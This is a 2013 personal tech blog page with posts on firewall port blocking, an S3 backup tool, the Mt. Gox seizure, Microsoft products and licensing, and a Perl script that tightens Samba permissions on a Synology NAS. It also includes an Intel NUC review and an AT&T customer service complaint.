Packetizer Logo
 

Paul E. Jones' Blog

Paranoia Leads to Excessive Use of Firewall Rules

June 24, 2013

All of us want to ensure our private information remains private and that data is not leaked onto the Internet. However, some IT departments simply go overboard in trying to secure information.

My wife recently worked for a company that would not allow any external communication by any employee without authorization from their management. Basically, without authorization there was absolutely no Internet access privileges at all. That’s certainly one way to control the leaking of information, though the same IT department had absolutely no means to prevent data from being copied to a flash drive. Thus, the policy must have been in place only to prevent leaking of information by “spyware” software that was unknowingly running behind the scene. That might have helped, but I doubt it. After all, there were many in the company with Internet access.

Her employer and many, many IT departments also practice something that absolutely makes little sense to me: blocking certain outbound ports. Sometimes, an IT department will block outbound UDP ports (all of them or ranges). Other IT departments will block nearly all outbound TCP ports. To what end? Is the intent to try to prevent leaking information to the Internet? If so, that is a pretty pointless exercise, if the IT department leaves port 443 (HTTPS) open. One could copy a company’s entire collection of data files right out through port 443. Further, software designed to steal information will exploit any potential hole. Whether there is a single port open or 65,535 ports open, it makes no difference. One is all that is needed.

Is the reason for blocking certain outbound ports to prevent employees from using certain software programs? If so, why? Is there truly a business reason to prevent use of certain applications, or is the practice just to demonstrate a certain level of control over employees “because we can”?

Since few reasons make little sense to me, I’ve come to conclusion that the practice of blocking outbound ports on a firewall is really something done out of paranoia. There appears to be a widespread fear of the unknown when it comes to the Internet. An expert in networking and hacking can get anything through a firewall if even one port is open, so blocking a bunch of ports if a futile exercise. What blocking ports does is create more frustration for end users and more work for IT departments as they try to figure out what ports to open for applications users want to use. What it really does not do is provide any real security, which is the claimed objective.

Permalink: Paranoia Leads to Excessive Use of Firewall Rules

Backing Up Files to Amazon S3 Using Pug

May 26, 2013

Like many other people, I have a need to do routine backups of my data. And like many others, I have to concern myself with not just my own files but, but everyone’s files on the network. Backing up data can be a mind-numbingly boring chore after a while, only made worse by the fact that I really have better things to do than to deal with backing up data frequently.

Years ago, I used to back up data to magnetic tape. Yeah, that was a long time ago, but it helps put things into perspective. I’ve had to deal with this problem far too long. I graduated with time from magnetic tape to other external storage devices, most recently being USB drives.

I tried a variety of techniques to backing up data, including full data backups to incremental backups. Incremental backups are so nice to perform, since they require far less time. However, if you have ever had to restore from an incremental backup, you know how painful that can be. You have to restore the main backup and then each individual backup. And it’s only made worse when what you need to restore is just one user’s files or a single file.

There is also the hassle of dealing with physical backup devices. You cannot simply store those on site, because they are subject to damage by fire, water sprinklers, etc. So periodically, I would take drives to the bank for storage in a safe deposit box. That just added to the pain of doing backups.

What I wanted was a backup solution that met these requirements:

  • I wanted a fully automated solution where I didn't have to be bothered with physical storage devices, storing physical drives in a bank vault, etc.
  • Once put in place, I wanted a solution that "just worked" and was fault tolerant
  • I wanted a solution that was secure
  • I wanted a solution that would work incrementally, storing only new or changed files each day (or even each minute)
  • I wanted a means of storing multiple versions of files, any one of which I could retrieve fairly easily
  • I wanted a solution that would not waste space by storing the same file multiple times (which is a problem when multiple users have the same copy of the same file)
  • I wanted a solution that would preserve locally deleted files for whatever period of time I specify (i.e., if a user deletes a file, I want to be able to recover it)
  • I wanted a solution that would allow me to recover any version of a file for some period of time
  • I wanted a solution that I could rely on even in the face of a natural disaster

Fortunately, cloud storage options came along, which had the potential for meeting many of the above requirements. Perhaps most popular among those cloud storage options is Amazon S3. Equally important, Amazon S3’s pricing is fairly reasonable. If one has 100GB of data to store, for example, the cost of storage is US$9.50 per month today. Amazon also has a very good track record of reducing the price of cloud storage as they find ways to reduce those costs, making it even more attractive.

The challenge I had was finding the right software.

I found several packages that would synchronize an entire directory with S3, but that did not meet many of my requirements. For example, if a user accidentally changed a file and then then the sync took place, the original file was lost forever. Likewise, I would not want an accidentally deleted file to be removed from cloud storage.

I also found tools that would create full backups and store those in the cloud. However, that approach is extremely costly in terms of storage and bandwidth. I also found some that worked incrementally, wherein one large backup is made and then only changes were made. The problem with that is that restoring the files meant that downloading the main backup file and then every single incremental backup. That’s painful even doing a full restore, but horribly painful when trying to restore just a single file.

So not finding a tool that really met my needs, I decided to write my own. The result is a backup program I call Pug. Pug replicates new and changed files to the cloud as they are discovered and deletes files from the cloud when they are deleted from local storage. Importantly, controls are given to the administrator to allow any number of versions of files to be maintained in cloud storage and to maintain deleted files for whatever period of time one wishes. Thus, I can maintain a complete history of all files stored in local storage and retrieve any single one of them.

In practice, I do not keep all versions of all files. While Pug will allow that, I keep at most 14 revisions of files. And if a file is deleted, I will keep the deleted file around for 90 days. These are just my configured policies, but you get the idea. Pug takes care of everything automatically. The intent is to have a flexible solution that will work in many enterprise environments.

Pug also meets my other requirements in that it never uploads the same file twice, regardless if there are 100 copies on the network. Before uploading to Amazon S3, it compresses files using gzip and then encrypts them using AES Crypt. This provides for bandwidth efficiency and security. (Note: do make sure you keep AES Crypt key files well-protected and stored somewhere other than Amazon S3 in plain view!)

I have been using Pug for a while and I’m quite pleased with the results. I no longer have to deal with routine backups to physical devices, the system automatically scans all locations (local file system files and files on NAS devices) looking for files to upload or delete, and, of course, the data is securely maintained off-site.

Permalink: Backing Up Files to Amazon S3 Using Pug

US Government Trying to Kill Mt. Gox?

May 16, 2013

Sensationalism at its best, I think. Here's an affidavit filed by the US government in a move to seize all of the US-based assets of Mt. Gox, the largest Bitcoin exchange in the world.

Here's are the facts:

  • Mt. Gox is a Japanese company owned by Mark Karpeles (and perhaps others)
  • Mr. Karpeles opened a company in the US that is, as I understand, a wholly-owned subsidiary of Mt. Gox called Mutum Sigillum, LLC
  • Mutum Sigillum, LLC opened a bank account at Wells Fargo, stating it was not a money-transmitting business
  • One can use Dwolla (US company) to put funds into your Mt. Gox account, and the money goes from Dwolla to the Mutum Sigillum LLC
  • Mutum Sigillum LLC credits your account at Mt. Gox, transferring money between its account in Japan (held at Sumitomo Mitsui Bank) and its account in the US (held at Wells Fargo)

So, the US government decided that Mutum Sigillum LLC is a "money transmitter". But where was the money transmitted to? It was transmitted to that person's account at Mt. Gox. This is effectively more-or-less the same notion of wiring money from your bank account in the US to your bank account in Hong Kong, I suppose. Is this a money transmitter? The definition is this:

The term "money transmitting business" means any business other than the United States Postal Service which provides check cashing, currency exchange, or money transmitting or remittance services, or issues or redeems money orders, travelers' checks, and other similar instruments or any other person who engages as a business in the transmission of funds, including any person who engages as a business in an informal money transfer system or any network of people who engage as a business in facilitating the transfer of money domestically or internationally outside of the conventional financial institutions system (Source: 31 USC § 5330(d)(1))

It sounds like the company might be transmitting money, since it is sending money from a customer's account in one place to the customer's account in a different place. The US is trying to argue the company does currency conversion, but Mutum Sigillum LLC does not -- only Mt Gox does that, which is the company based in Japan. So that part of the complaint from the US is nonsense. But, they are still "transmitting money", perhaps. The issue I have with this is that they are not transmitting money to other people. They are merely moving it from one account that YOU own to another account YOU own. So, transmitted where? To yourself.

So perhaps it still qualifies as a money transmitter. But, then again, who actually transferred the customer's money to Mutum Sigillum LLC? Dwolla did. They have a money transmitter license, I guess. Mutum Sigillum LLC just transferred its OWN money to their OWN account in another country. How was this transmitted? They used Wells Fargo, which is either also a money transmitter or exempt as per the end of that definition, since they are a "conventional financial institution". (You have to love how big banks are given a break here.) So, who transmitted the money? The bank did.

So, Dwolla, the bank, and Mutum Sigillum LLC are ALL money transmitters? I can appreciate the first two being classified as such, since they move money from one entity to another entity. Mutum Sigillum LLC does not do that: they transferred funds to themselves: the beneficiary they list on their wire transfers is themselves. Further, Mutum Sigillum LLC used established money transmitters to transfer money: nothing is hidden or secretive in the transaction.

I'm having a tough time seeing how the government is in the right here. It looks to me like they just do not like Bitcoins, feel they are a threat, and are looking for every opportunity to kill it for whatever reason.

What about Dwolla? Are they a money transmitter? In their terms of service, they say, "You also understand that we are not acting as a fiduciary, trustee, money transmitter, or providing any type of escrow service with respect to your funds, but only acting as the receiver’s agent." So, they declare they are not. And they might be able to make the argument since there is a credit union behind them actually performing money transfers. (Like Mutum Sigillum LLC.) So, it's OK for Dwolla to not have a license, but Mutum does need one?

And one does have to ask: if the company is not in compliance with the law, rather than taking all of the money -- which includes customer funds! -- why did they not first notify them of a compliance requirement? The heavy-handed action makes it damned hard for any startup to build a business. After all, there was certainly no criminal intent here. They just want to allow people to buy and sell Bitcoins.

This leads me back to one argument: the government just does not like Bitcoins.

Permalink: US Government Trying to Kill Mt. Gox?

Microsoft Will Remain the Leader in the Computing Industry

April 2, 2013

Reading my most recent post about Microsoft and their insane product activation procedures, one might surmise that I don’t like Microsoft products very much or loathe the company. Actually, I rather like Microsoft products and held the opinion for years that Microsoft did more to progress personal computing industry than any other firm out there. While all companies operate for the purpose of making a profit and Microsoft is no exception, the company truly produced some of the best software products on the market.

Consider Microsoft Office as one example. Hands down, it is the best productivity suite on the market. Yes, I’ve tried competitive products. There are some good alternatives out there, but they pale in comparison to Office. Some of competitive commercial products are really good (e.g., Corel’s office suite) and LibreOffice, which is a free open-source product, is also pretty good. However, they all fall short when it comes to matching features of Microsoft Office. More importantly, none of them do a perfect job at rendering documents created in Microsoft Office. Perhaps it is not fair to judge a product based on how well it reproduces a Microsoft Office document, but that is really a very important consideration for any potential replacement for Office. I recall many years ago when I made the move from WordPerfect to Word for Windows. Microsoft did a pretty good job at converting documents, but it was not perfect. Many who were heavily invested in WordPerfect simply could not make the move, but WordPerfect really dropped the ball by being so late to move to the Windows platform. They more-or-less opened the door to Microsoft. At the same time, Lotus and Borland were in a spat over the look and feel of a spreadsheet program and being so engaged in a pointless debate, they did not see Microsoft come in strong with a very good product for Windows, taking the spreadsheet business away from both of them. In the end, Microsoft was king of the productivity suites, and they have not stopped innovating. They continually improve the core productivity tools and have introduced great new products like OneNote.

However, Microsoft did drop the ball in a few areas. These days, I use Google’s Chrome browser because Microsoft failed to keep the innovation engine running with Internet Explorer. Internet Explorer 6 lived way too long and Microsoft essentially handed the business to Chrome and Firefox. That matters, because many of the more recent innovations in computing have been in the browser area. The browser is helping Google, for example, wrestle some control of the productivity space away from Microsoft by offering free browser-based productivity tools that, while not perfect, are free, “good enough”, and accessible from the browser.

Microsoft absolutely and completely dropped the ball in the mobile computing area. They dropped the ball so hard that it created a crater around the Redmond campus several feet deep. The first abysmal failure was the failure to make substantial updates to Windows Mobile. Those who developed applications for Windows Mobile know how horrible the Windows CE development environment was. However, it wasn’t just the operating system itself. End users do not care so much about the operating system. Rather, they care what they can do with it. Microsoft delivered a fairly crippled platform with Windows Mobile. This gave Apple the opportunity to come into the market and show how to do it right. And they did. The iPhone was an awesome piece of technology at the time.

The second major failing in the mobile computing space was Microsoft’s extremely slow move to get into the tablet computing market. That was most unfortunate, too, since Microsoft had been a leader in showing off what could be done in the tablet computing space. They just never seemed to get any products into production. Perhaps the issue was that they were so hung up on maintaining full compatibility with the legacy Windows desktop software.

Things are different today, though. Microsoft has learned a valuable lesson. Maintaining compatibility with all of the legacy applications is not important to consumers. What is important is providing a platform that consumers like. With the right platform, application developers will develop for that platform. As examples, we have the iPad and Android tablets. Apple and Google have stolen the tablet computing market, and it is refreshing to be able to use such thin, light-weight computing platforms to do the less-serious tasks.

Microsoft did wake up, though, and introduced two new mobile computing platforms: Windows 8 and Windows RT. Microsoft has received a lot of flak over Windows RT, but I actually think it was a good move. In fact, I would argue that Microsoft should not even have a traditional desktop mode on the tablet devices. The only reason it would be there is to allow legacy applications to run. However, that is only important in the short-term. If the desktop mode was not offered on tablets, application developers would develop to the APIs available on Windows RT and the applications would likely be more natural to the touch interface on the tablets.

In its rush to get into the tablet market, Microsoft screwed up the desktop. Windows 8 is a horrible desktop operating system. Yes, there are some improvements in efficiency, but I don’t need the start screen. I don’t want to scroll through a bunch of icons. I don’t want the screen flipping from “desktop mode” to the Start Screen to that screen one uses to find applications. It is really messy. People who buy Windows to run on the desktop want a desktop. People who buy tablets want a tablet. The two environments are different and should stay different. Unless Microsoft fixes this mess with Windows 9, then I fear Microsoft will risk driving even more of its users to Mac or Linux. Yes, I said Linux. If you’ve not taken a good look at operating systems like Ubuntu or Linux Mint, you should. Those systems provide a lot of functionality and can run Windows applications, either through tools like Wine or VirtualBox.

These days, I use a Nexus 7 as my tablet device. It’s really a perfect size for a lot of the more casual things I want to do. There is only one thing I would prefer more than a Nexus 7 and that would be a Windows RT device that is about the same size and had an RT version of Microsoft Office built in. If it came in with a comparable price tag, the Windows RT tablet would definitely win.

There is a lot of speculation in the market these days about Microsoft’s market strategy and many paint some very gloomy pictures for the company. I’m actually very upbeat about Microsoft’s future in the computing space. Yes, personal computer sales are down, but they are not dead. Contrary to some calling this the “post PC era”, I would argue the PC is here to stay. I cannot do my job on a tablet, and I know very few who can. Further, I would not want to do my job on a tablet. It’s painful, to say the least. It is simply the wrong tool for doing a job. However, I can appreciate why many consumers are buying tablets and not buying PCs. One reason is that some do not really use their computer to do real work, anyway: it’s a glorified web browser. Another reason is that consumers have a PC and are buying tablets to augment those PCs. The latter class of consumers will likely upgrade when there is a compelling reason. Windows 8, unfortunately, is not a compelling reason. Further, Windows 8 is horrible for the enterprises that depend on desktop applications to get real work done.

I do not know what Microsoft has in store, but contrary to what many are suggesting, I think Microsoft should kill the Windows 8 Pro tablet and focus only on Windows RT. That model has proven to work with both iPad and Android tablets. Application developers can build great Windows applications on Windows RT. At the very least, get rid of the desktop mode on the tablet. At the same time, Microsoft needs to do something with Windows 9 so that it is once again a usable desktop operating system for those who use a PC either at home or at work.

I want a tablet to do things I would do on a tablet. I want a desktop operating system to do things I do on a desktop machine. The two do not have to be precisely the same platform, but what I would want is to have Microsoft Office on both. That is the one piece of software that Microsoft holds in its hands that can make it stand out above all competitors. And I don’t think I’m alone here. I suspect that Microsoft could probably “own the market” on both the desktop and tablet, but their current offerings in both are a bit lacking. However, I’m positive they will get this sorted out.

Permalink: Microsoft Will Remain the Leader in the Computing Industry

Microsoft Product Activation Sucks

March 26, 2013

Today for no sane reason, Microsoft Office on my PC decided that it was not activated, even though it has been installed and activated on my machine for well over a year. It opened a window and told me I had 28 days to activate it. So, what’s wrong? I tried to re-enter the activation key and Office would tell me that my key was not valid.

This became a very long process. I’m going to detail everything below, but I don’t blame you for wanting to skip the details. It’s pretty dry reading. The bottom line is that Microsoft’s product activation crap screwed up and, due to no fault of my own, cost me several hours. I counted at least 4 hours of wasted time. That did not include writing this up, but this just helps me feel better. :-)

I went through various steps in the troubleshooting page that the product activation window directed me to on Microsoft’s web site. Everything seemed to check out fine and I finally get to a page that says “Microsoft Customer Service may be able to help” and I was presented with a phone number. I call the phone number and select the “business customer” option. I get to a lady who asks if I have a support contract. I’m sure my company does, but I don’t know what it is. She said that it would cost over $500 to provide support to me! My gosh! Seriously!?! I told her the nature of the problem and she went ahead and tried to help me out. She never asked for credit card information, though. I trust that was a free call. I’m still beside myself that a single support call would cost more than the product itself!

She asked me for the product key, the serial number on my physical disc, etc. She verified everything and said it all appeared valid and she then said she will transfer the call to the product activation team for further assistance. She said that is who I should have called in the first place. Well, I would agree, but I have no idea why Microsoft’s troubleshooting guide related to product activation would lead me to customer service.

I then get transferred to some fellow named Raul. He asked for some number that I had never heard of before. I asked what number he was referring to and he just countered my question with “You are trying to activate Office 2010, right?” I said yes and he then made the same request for some number. I again told him I have no idea what number he’s referring to, so he said he was going to transfer me to customer support. “But, I was just there and they transferred me to you!”, I told him. I asked why I should be transferred to customer support when the issue is product activation. He put me on hold for a moment and the next thing I know I am transferred to customer support, but this time they tell me that the customer support is closed. Nice.

So, I called back. The lady I spoke to in customer service before gave me the direct number (+1 866 432 3012). I spoke to a fellow there and we went through the motions again. Finally, he said he needed to transfer me to customer support. I told him that customer support was closed already, but he insisted and asked me to stay on the line. I did, but then the line dropped. I’m not sure if he accidentally dropped the line or hung up on purpose. After being tossed around like a volleyball, I do have to wonder.

There’s apparently a problem somewhere and I don’t think he can resolve it. He did confirm that my product key was valid, but for whatever reason, Office 2010 is telling me otherwise.

It was late at night. I went to bed.

The next day, I called Microsoft’s activation number. Again, they ask me two times to read the product activation key and they tell me that it validates. Now, just in case you are not aware, those product activation keys are very long alphanumeric sequences. To say that I’m tired of repeating this number is an understatement. After verifying that it validates, I was transferred to customer support. I was also provided with a direct number to customer support (+1 800 936 5700) and a case was opened for support (case # 1201074501). The wait time is 33 minutes, but fortunately there is an option to allow Microsoft to call me back.

In the meantime, I was curious as to whether communication was really happening between my PC and Microsoft’s activation servers. Oddly, I could not see any. I used Wireshark to try to watch traffic between my PC and Microsoft. I saw IP packets going to several places that I could identify, but none going to Microsoft. So, is Office even communicating with Microsoft’s servers? I disabled the network interfaces on my laptop and got the same results. Office isn’t even talking to Microsoft!

I got a call back from Microsoft. The support person said they need to reinstall Office 2010. Why!?!? How did it break? I didn’t break it. Nothing new has been installed, except for the updates that come down from Microsoft. So, did Microsoft break Office in some Windows update? In any case, I could not wait on an update, because I had a meeting to attend.

The Microsoft representative called me back after the meeting and uninstalled Office and re-installed it. Interestingly, he said he had to use a new activation key. He blamed the activation server for something, but it was not clear to me as to what the issue was. All I know is that he used a new key, but interestingly he used the old installation binary. So, I’m wondering why the re-install was even needed. If he had to change keys for some external reason, then I don’t understand the need to re-install the software.

He also applied a number of Windows registry changes, change the user account control settings to be insanely generous, changed permissions in the temp directory, and modified my preferred folder view settings. I asked him to change the folder permissions back, but I still had to go change the other things myself and double-check settings. I then had to re-download a bunch of patches via the Windows Update.

Next up, a bunch of applications got screwed up somehow. From what I can tell, some important files in the c:\windows\installer directory were deleted in the process. Damn! How many hours of my day am I obliged to waste because of this crap? I’ve wasted several already and it looks like I’m going to have to re-install a bunch of applications.

Permalink: Microsoft Product Activation Sucks

PDF Creation, Editing, and Viewing

March 18, 2013

It seems that with each passing year, the value of PDF is increasing. It is the common document format that allows one to perfectly view a document on a wide variety of computing platforms, from PCs and Macs to tablets and mobile phones. In recent years, though, Adobe Reader has been plagued with issues. Actually, I’ve been fortunate enough to have never encountered those issues, but Adobe sends out updates from time-to-time wherein they patch some security vulnerability. So, there are definitely issues.

Adobe’s most recent update to their Windows version of Reader did present me with a problem, though: I could not open two PDF documents at the same time. It did not matter what I did, it was impossible to open a second document.

So, I went looking for an alternative PDF viewer for my PC. I decided to give Foxit a try. I had heard about Foxit a few years ago, but did not really know how well it compared to Adobe. I was impressed right away. It seemed to load quickly, render quickly, scroll quickly, and I could not find a document that presented rendering issues. (Yeah, that is the one ugly truth about PDF. It’s universally available, but largely because Adobe Reader is universally available. In my experience, other software does not always consistently render PDF documents properly.)

I’ve been using Foxit every day now for a few weeks. It’s a really great PDF viewer. So far, I have not found a single instance where it failed to properly render a PDF document.

Permalink: PDF Creation, Editing, and Viewing

Microsoft Office 2013: Licensing from Hell

March 4, 2013

I upgrade to the latest version of Microsoft Office every time a new version is released. While some feel that Office has more features than anyone needs, I spend much of my time working in Office and have always appreciated the new enhancements and features that came with each new Office release.

Unfortunately, Office 2013 brings with it such insane licensing agreements that I cannot buy it. I do not have any reasonable options. There are basically four options I could consider, but each one presents a roadblock.

Option 1 – Office 2013 Professional

This is more-or-less the same product I have purchased from Microsoft with every product update. In the past, I could install that on my primary desktop and I could install it on my laptop. I could use it for work-related activities or personal stuff. If I bought a new machine, I could uninstall it from my old machine and install it on my new machine. The Office 2013 Professional license agreement forbids that. It says that the software is licensed for a single computer and that “you may not transfer the software to another computer or user.” You are not allowed to install a second copy on a laptop, either. Honestly, I don’t care about the desktop and laptop installs. However, I do buy new computers from time-to-time and if I buy a new one, I don’t want to be in a situation where I cannot install Office. And, that’s exactly what it says. I cannot do that. Just imagine spending $400 on new software tomorrow and the next day your computer breaks. You’re out of luck. You lose your computer and your $400 for Office.

Option 2 – Office 365 Home Premium

This is Microsoft’s new subscription service. You basically get everything in the $400 Office Professional version, except it’s a subscription service. With the service, you get updates at no charge as long as you maintain the subscription. The cost is $100/year, which is a reasonable price as compared to the Office Professional 2013. Further, you have the right to install and use Office on up to 5 different computers. You can even use it on Mac or Windows. Boy, for those looking for an opportunity to escape Windows for a Mac, this is the ticket.

Unfortunately, this option has a major problem: it’s licensed for home use only. You are not allowed, per the license agreement, to use it for business. It states that Home Premium is for home use. So, if I use this for business? It is rather explicit about saying it is for “Home” and “Non-Commercial Use”. So, what if I author a document for work using it? Apparently, that’s not acceptable. My wife owns a business where she needs to use Office about 10% of the time, whereas the other 90% is personal. Well, that’s not permitted, either. Both of those activities would be classifies as commercial use. So, Option #2 is out.

Option 3 – Office 365 Small Business Premium

This option allows one to buy Office for use in business. Oh, but this one is explicitly listed as a product for business use only. I assume that is the case, because this page says “for business use” under the “Which Office products are available for home and business?” drop-down. Further, if you try to sign up, it wants your business name and email. But, I don’t want something exclusively for business. This is sometimes used at home and sometimes I use it for work. So, this one is out.

Option 4 – Office Home & Business 2013

This one is like Office 2013 Professional, except it is missing Publisher. I want Publisher! So, I buy this and don’t get Publisher? I guess so, but it has a lower price, too. I guess I could buy Publisher separately. The problem is that, like Office 2013 Professional, it is tied to a single computer. You spend the $220 they are asking for the product, but have the risk that if the computer dies, your $220 goes out the window. No thanks.

Conclusion

Microsoft has successfully created a licensing scheme that is so messed up that I have no upgrade path. Congratulations, Microsoft. I’ll keep using Office 2010, as I have no viable, legal alternative. In the meantime, I’ll have to invest a little time evaluating alternatives. There is Kingsoft, WordPerfect, and LibreOffice. Others?

UPDATE: It appears that Microsoft heard this complaint from too many customers, as they have made a sane step toward licensing. It is now permissible to transfer purchased copies of Office from one machine to another, if you wish.

Permalink: Microsoft Office 2013: Licensing from Hell

Resetting Directory and File Masks on Synology NAS

December 9, 2012

If you have a Synology NAS and you mount those file systems on Linux, you see something horrible. Synology always sets the directory and file creation masks to 0777, so all files and directories are readable and writable by everybody else on the Linux machine. It works fine on Windows since access to files is controlled by the Samba software.

If you're like me, though, you want a little more control. This Perl script, when run on a Synology NAS server running DSM 4.1, will add the desired config lines to the smb.conf file. Put is over in /usr/local/bin/modify_samba_config (make sure root can execute this program).

NOTE:DSM 5 and DSM 6 changes a few things. See the notes at the bottom.

Source Code

#!/usr/bin/perl
#
# Modify the smb.conf file on the Synology disk station
#

# Location of the smb.conf and temp files
$smb_file = "/usr/syno/etc/smb.conf";
$tmp_file = "/tmp/mod_smb_cfg.$$";

# Below are the names of the shares and to the right
# are the config lines to introduce
%share_config =
(
    'archive'            => [
                                  "directory mask = 0755",
                                  "create mask = 0644"
                            ],
    'music'              => [
                                  "directory mask = 0755",
                                  "create mask = 0644"
                            ],
    'pictures'           => [
                                  "directory mask = 0755",
                                  "create mask = 0644"
                            ],
    'public'             => [
                                  "directory mask = 0775",
                                  "create mask = 0664"
                            ]
);

#
# SameOption
#
# This function will check to see if the option names are the same
#
sub SameOption
{
    my (@options) = @_;

    my ($i);

    if ($#options != 1)
    {
        return 0;
    }

    # Normalize values
    for ($i=0; $i<=1; $i++)
    {
        $options[$i] =~ s/=.*//;          # Remove everything after =
        $options[$i] =~ s/^\s+//;         # Remove all leading whitespace
        $options[$i] =~ s/\s$//;          # Remove all trailing whitespace
        1 while $options[$i] =~ s/  / /g; # Remove excess spaces
    }

    if (($options[0] eq $options[1]) && (length($options[0]) > 0))
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

#
# MAIN
#
# The following is the main logic of the program
#

# Read the old config, make changes, writing to a temp file
open(SMBFILE, "< $smb_file") || exit;
open(TMPFILE, "> $tmp_file") || exit;

while(<SMBFILE>)
{
    # We will assume the current line will be printed
    $print_line = 1;

    # This logic will remove lines from the existing config that are
    # added via the $share_config array
    if ((!/^\[/) && (length($section_name) > 0))
    {
        $tline = $_;
        chomp($tline);

        foreach $line ( @{ $share_config{"$section_name"} } )
        {
            # Is the current config option in our
            if (SameOption($tline, $line))
            {
                $print_line = 0;
                last;
            }
        }
    }
    if ($print_line)
    {
        print TMPFILE;
    }
    next unless /^\[/;

    # Add configuration lines as specified in "share_config"
    chomp($section_name = $_);
    $section_name =~ s/^\[//;
    $section_name =~ s/\].*//;
    foreach $line ( @{ $share_config{"$section_name"} } )
    {
        print TMPFILE "\t$line\n";
    }
}

close(SMBFILE);
close(TMPFILE);

# Read the temp file in and replace the original config file
open(TMPFILE, "< $tmp_file") || exit;
open(SMBFILE, "> $smb_file") || exit;

while(<TMPFILE>)
{
    print SMBFILE;
}

close(TMPFILE);
close(SMBFILE);

# Get rid of the temp file
unlink($tmp_file);

You can modify the config lines, adding or removing whatever you wish. The "keys" in that hash (e.g., "archive" and "private") are the names of the Samba shares created on your Synology box. You'll need to assign those appropriately. You can have different additions per "share" to customize whatever you wish. (Note that if Synology already has a config line like what you introduce, your config line might be ignored. I've not tested what happens if there are two conflicting config lines.)

Now, you want this script to run before Samba starts. I tried adding it to rc.local, but the synology box loads services like Samba in the background, so there is a risk of a race condition and things not working right.

What I decided to do was create a "service" that the Synology box calls before it starts Samba, but after it has re-built the config (which it does every time the machine boots). I created a script in /usr/syno/etc/rc.d/S80alt_samba_config.sh. The Samba service is S80samba.sh, so this script will get called first (alphabetical sorting).

Source Code

#!/bin/sh

if [ $# -eq 0 ]; then
        action=status
else
        action=$1
fi

# dispatch actions
case $action in
        start)
                /usr/local/bin/modify_samba_config
                ;;
        *)
                # Do nothing with any other command
                ;;
esac

That's it! Now, if you reboot the NAS server, you should get the permissions in Samba as you wanted.

DISCLAIMER: This is not a technique you should try if you're not familiar with Linux system administration. I cannot help you if you break your NAS server. Carefully review the code and test it before using it.

UPDATE: It appears that each time you install an update of the DSM software, the /usr/syno/etc/rc.d directory gets replaced. So, you'll have to put the "80alt_samba_config.sh" script back on place each time. The /usr/local/bin/ directory appears to remain untouched.

UPDATE: With DSM 5, I think it was, the name of the rc.d script had to change to S02smbfix.sh in order to run at the proper time.

UPDATE: With DSM 6, Synology moved things around. The smb.conf file is now in /etc/samba/. So, the line that says '$smb_file = "/usr/syno/etc/smb.conf";' needs to change to '$smb_file = "/etc/samba/smb.conf";'. Also, the rc.d directory changed. It appears that placing the script "S02smbfix.sh" into /usr/local/etc/rc.d will work.

Permalink: Resetting Directory and File Masks on Synology NAS

Intel's Next Unit of Computing

December 2, 2012

Intel released a really cool new device called the Next Unit of Computing. It's a small 4x4x2" box that packs the power of an Intel Core i3 processor. It has three USB ports, two HDMI ports, a gigabit Ethernet port, and consumes very little power as compared to normal a desktop machine.

It's designed to be mounted right on the back of a display using the supplied VESA mounting bracket, turning any display device into a computer.

It was not made for the technically challenged, though. At the same time, one does not have to be a hardware expert, either. It is sold as a kit, and one has to buy the memory and storage separately. While that was expected, what was not expected is the fact that the kit is shipped without a power cord to go from the power brick to the wall. I had to make a run to the local CompUSA to get one of those.

It uses an mSATA drive for storage and can hold up to 16GB of DDR3 RAM.

I purchased a 128GB mSATA drive and 4GB of RAM for mine. Total cost was about $440 for the NUC, storage, RAM, and power cord.

I've only had it running a few hours, but this thing is awesome. I installed Linux on it and replaced one of my aging Linux machines. I use Linux machines in my house to provide various network services, including DHCP, TFTP, and DNS, and use the devices when writing software on Linux, including AES Crypt. These devices also handle storage functions for me, allowing me to back up data to Amazon S3.

I don't have a monitor or keyboard connected to the box. It's just a tiny little box connected to the network that I access via SSH that serves a useful purpose for me and my family.

Another great feature with this device is that it consumes far less power than the desktop it is replacing. The desktop I was using was not a monster machine: just a low-end Dell Dimension. Even so, I could tell from the display on my UPS that the box consumes far less power.

So, I save space in the house, the machine runs way faster (since it's solid date vs. traditional hard drives), and save energy. What's not to like? Very cool box.

Permalink: Intel's Next Unit of Computing

Frustrating Customer Service Agent at AT&T

November 30, 2012

On October 8, 2012 I went to my local AT&T store to get a prepaid SIM card. I just needed an extra phone for about 4 months with just voice service. The representative at the store suggested that I just add a line to my current monthly plan, since I'd probably save money that way. He said he'll waive the activation fee and the contract period for the new line. So, rather than paying for $25/mo for the prepaid card, I could pay just $10/mo using my existing plan (plus taxes, 911 fees, etc.) In all, I could probably save 50% that way. He made a kind offer to do that, but likely because I've been a customer of AT&T a long time.

He printed out the service summary sheet and marked through the things that were waived. You can see that below.

Though this was the agreement we had, I was charged the activation fee on my bill this past month. Oh, well. Mistakes happen, right? So, I called AT&T to get it corrected.

The lady was absolutely horrible. I don't think she necessarily believed me, speaking down to me as if I was a peasant. She really had a condescending tone to her voice. She told me, "We'll waive the fee this one time, but we'll put a note on your account and if you add another line, we will not waive the fee again." So, now she's is doing me a favor? Or was this a threat? I can't tell which. Between the tone of voice, suggestion she's doing me a favor "this one time", and the threat that AT&T will never extend an offer to waive an activation fee again, I got mad.

Sometimes, I really, really hate AT&T. Working in the communications business, I have a number of friends who work for AT&T and I've worked with their engineers on projects. The company has many good people, but representatives like this battle ax are what frustrate customers and drive them elsewhere.

Permalink: Frustrating Customer Service Agent at AT&T